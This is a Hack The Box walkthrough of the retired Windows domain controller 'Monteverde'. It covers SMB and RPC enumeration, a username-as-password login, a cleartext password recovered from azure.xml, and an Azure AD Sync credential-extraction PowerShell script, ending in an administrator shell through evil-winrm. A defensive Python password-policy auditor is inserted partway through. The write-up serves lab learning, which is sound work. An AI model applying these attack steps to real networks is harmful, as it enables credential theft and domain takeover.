Hackthebox.eu - Retired - Monteverde
Recon
As always I start with a simple up/down scan on all TCP ports to see what is open.
nmap -T4 -p- -oX /root/Desktop/HTB/monteverde/nmapb.xml 10.10.10.172
Then I convert that to HTML:
xsltproc /root/Desktop/HTB/monteverde/nmapb.xml -o /root/Desktop/HTB/monteverde/nmapb.html
That's a bunch of open ports. Let's run nmap again against just these ports with the -A switch to try and fingerprint the OS and services.
nmap -T4 -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49669,49670,49673,49702 -A -oX /root/Desktop/HTB/monteverde/nmaf.xml 10.10.10.172
Then convert that to HTML (I fixed my little typo in the file name here):
xsltproc /root/Desktop/HTB/monteverde/nmaf.xml -o /root/Desktop/HTB/monteverde/nmapf.html
OK, it looks like a Windows box, and a domain controller at that.
We can see megabank.local as the domain name, and we can also see what looks like WinRM on 5985.
Let's try to see if we can see anything on SMB.
It's there and allowed us to connect anonymously... but didn't list anything.
Since it's open, let's see if we can connect with rpcclient.
Let's grab the users:
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
How about groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Azure Admins] rid:[0xa29]
group:[File Server Admins] rid:[0xa2e]
group:[Call Recording Admins] rid:[0xa2f]
group:[Reception] rid:[0xa30]
group:[Operations] rid:[0xa31]
group:[Trading] rid:[0xa32]
group:[HelpDesk] rid:[0xa33]
group:[Developers] rid:[0xa34]
I fired up enum4linux to map some of this out for us:
enum4linux -a 10.10.10.172
Some of the output:
Domain is MEGABANK
Group 'Operations' (RID: 2609) has member: MEGABANK\smorgan
Group 'Operations' (RID: 2609) has member: MEGABANK\smorgan
Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator
Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator
Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt
Group 'Domain Users' (RID: 513) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Domain Users' (RID: 513) has member: MEGABANK\mhope
Group 'Domain Users' (RID: 513) has member: MEGABANK\SABatchJobs
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-ata
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-bexec
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-netapp
Group 'Domain Users' (RID: 513) has member: MEGABANK\dgalanos
Group 'Domain Users' (RID: 513) has member: MEGABANK\roleary
Group 'Domain Users' (RID: 513) has member: MEGABANK\smorgan
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\Administrator
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\mhope
Group 'HelpDesk' (RID: 2611) has member: MEGABANK\roleary
Group 'Trading' (RID: 2610) has member: MEGABANK\dgalanos
[+] Password Info for Domain: MEGABANK
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: 41 days 23 hours 53 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: 1 day 4 minutes
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
Digging around on these accounts and looking at the last logon date, I can see that only 3 of the accounts have ever been logged into:
Mhope
SABatchJobs
AAD_987d7f2f57d2
We know the password policy from the output of enum4linux.
I just tried logging into SMB with them. I tried mhope first with a couple of generic passwords, then I moved on to SABatchJobs.
I just tried the username as the password, since there are no complexity requirements set in the password policy.
We got in.
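The password policy dump above is the defender's early warning for exactly what happened next: with complexity off and no lockout threshold, a password equal to the username is both permitted and can be guessed without tripping anything. The following is an added example, not part of this write-up, that parses an enum4linux policy block (the sample input is the block quoted above) and flags the weak settings. The severity labels and the 12-character minimum are this example's own assumptions, not values from the write-up.

```python
import re

# Constructed sample input: the password-policy lines from the enum4linux output above.
SAMPLE_POLICY = """\
[+] Password Info for Domain: MEGABANK
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: 41 days 23 hours 53 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: 1 day 4 minutes
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
"""

# Matches enum4linux's "[+] <setting>: <value>" lines.
LINE_RE = re.compile(r"^\[\+\]\s*(?P<key>[^:]+?)\s*:\s*(?P<value>.*)$")


def parse_password_policy(text):
    """Turn the '[+] key: value' lines into a dict keyed by the setting name."""
    policy = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            policy[m.group("key")] = m.group("value").strip()
    return policy


def _to_int(value, default=None):
    """Parse an integer setting; non-numeric values such as 'None' fall back to default."""
    try:
        return int(value)
    except ValueError:
        return default


def audit_password_policy(policy, min_length=12):
    """Return a list of (severity, message) findings for weak settings.

    The min_length threshold and severities are assumptions made for this
    example; pick the values your own baseline requires.
    """
    findings = []

    length = _to_int(policy.get("Minimum password length", ""), 0)
    if length < min_length:
        findings.append(("medium", f"minimum password length is {length}, below {min_length}"))

    # 'Domain Password Complex: 0' means no complexity rule, so a password that
    # equals the username (as used against SABatchJobs above) is accepted.
    if policy.get("Domain Password Complex") == "0":
        findings.append(("high", "password complexity disabled: username-as-password is accepted"))

    # 'None' or 0 means accounts never lock, so online guessing is unbounded.
    if _to_int(policy.get("Account Lockout Threshold", ""), 0) == 0:
        findings.append(("high", "no account lockout threshold: unlimited online guessing"))

    # Reversible encryption would expose every password to anyone who can read the DIT.
    if policy.get("Domain Password Store Cleartext") == "1":
        findings.append(("high", "passwords stored with reversible encryption"))

    return findings


if __name__ == "__main__":
    for severity, message in audit_password_policy(parse_password_policy(SAMPLE_POLICY)):
        print(f"[{severity}] {message}")
```

Run against the sample block it reports three findings: the 7-character minimum, complexity disabled, and no lockout threshold. The same parser can be pointed at the policy section of any enum4linux or `net accounts /domain` style dump during an internal review.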
Exploit
I tried connecting up to C$ and E$, but no luck.
But we do have access to users$.
I started poking around and found a file named azure.xml under the mhope directory.
I downloaded it using:
get azure.xml
That doesn't look like anything...
I spent a couple of hours moving around to different paths, but wasn't able to move any further. My mind kept coming back to this file: why would it be there if I didn't need it in some way to escalate?
Then it hit me: let's try to open this not with leafpad but with vim.
Yay!!! More creds:
4n0therD4y@n0th3r$
Since we found this in mhope's directory on the users share, I bet these are their creds. Let's try using them for WinRM, since I didn't have any luck with the SABatchJobs account.
I've been using RubyWinRM.
I edited my file to use her creds.
Then ran it:
#ruby rubywinRM
Let's get that hash yo:
496*******************************
Alright, now let's find out how to escalate.
Looking around at the installed programs, I notice this box has Azure AD Sync installed to sync AD to Azure.
Pretty quickly I found this blog on how to attack AD Sync to get the credentials of the account the sync service runs as:
https://blog.xpnsec.com/azuread-connect-for-redteam/
There is a PS1 script on the site which should pull out the MSOL user account.
First we need to look around and see if we need to modify the script at all.
OK, let's first verify that the ADSync DB exists:
get-sqldatabase -serverinstance Monteverde
Sure does.
Tried running the PS1 and got back lots of errors. It took me several hours to work through to a solution here to get it running.
I just started to troubleshoot as if I had written the code and tried to figure out where the script was breaking.
First I just pulled out the first two lines that make the DB connection to see if we are even starting to talk to the DB:
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"
$client.Open()
Connection error.
Well, we might need to change some things here. First let's change the data source to Monteverde, the box we are working against:
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=Monteverde;Initial Catalog=ADSync"
$client.Open()
OK, now we got a login error; that is better than not seeing the DB server at all.
Next I googled around for making DB connections from PowerShell and found something we might need to add to our connection string.
Let's add in our user/pass for mhope to see if that lets us in:
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=Monteverde;Initial Catalog=ADSync;user=megabank\mhope;password='4n0therD4y@n0th3r$'"
$client.Open()
Login failed... OK, what if we use integrated security to use Windows authentication:
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=Monteverde;Integrated Security = True;Initial Catalog=ADSync"
$client.Open()
No errors, cool. Let's swap that in for the connection string in the PS1 we found.
Errors about a missing '.
OK, the strings where it's complaining on line 68 look fine to my eyes, but let's remove that line just for testing and try again.
Now it's complaining about the line above it... let's delete that too.
I'm seeing a pattern here. Now it's complaining about the line above it. Let's delete it too.
OK, that was a jump; now it's line 44, which is:
add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll’
Let's try double quotes instead of single quotes.
No errors. Let's add back in the three lines we deleted during our troubleshooting:
$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerXML}}
Yay!!! We got some new creds:
Domain: MEGABANK.LOCAL
Username: administrator
Password: d0m@in4dminyeah!
Let's try to connect up to the RPC with these new creds:
evil-winrm -u megabank\\administrator -p 'd0m@in4dminyeah!' -i 10.10.10.172 -s /root/Desktop/HTB/monteverde/
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
megabank\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat C:\users\administrator\desktop\root.txt
129*******************************
That was fun.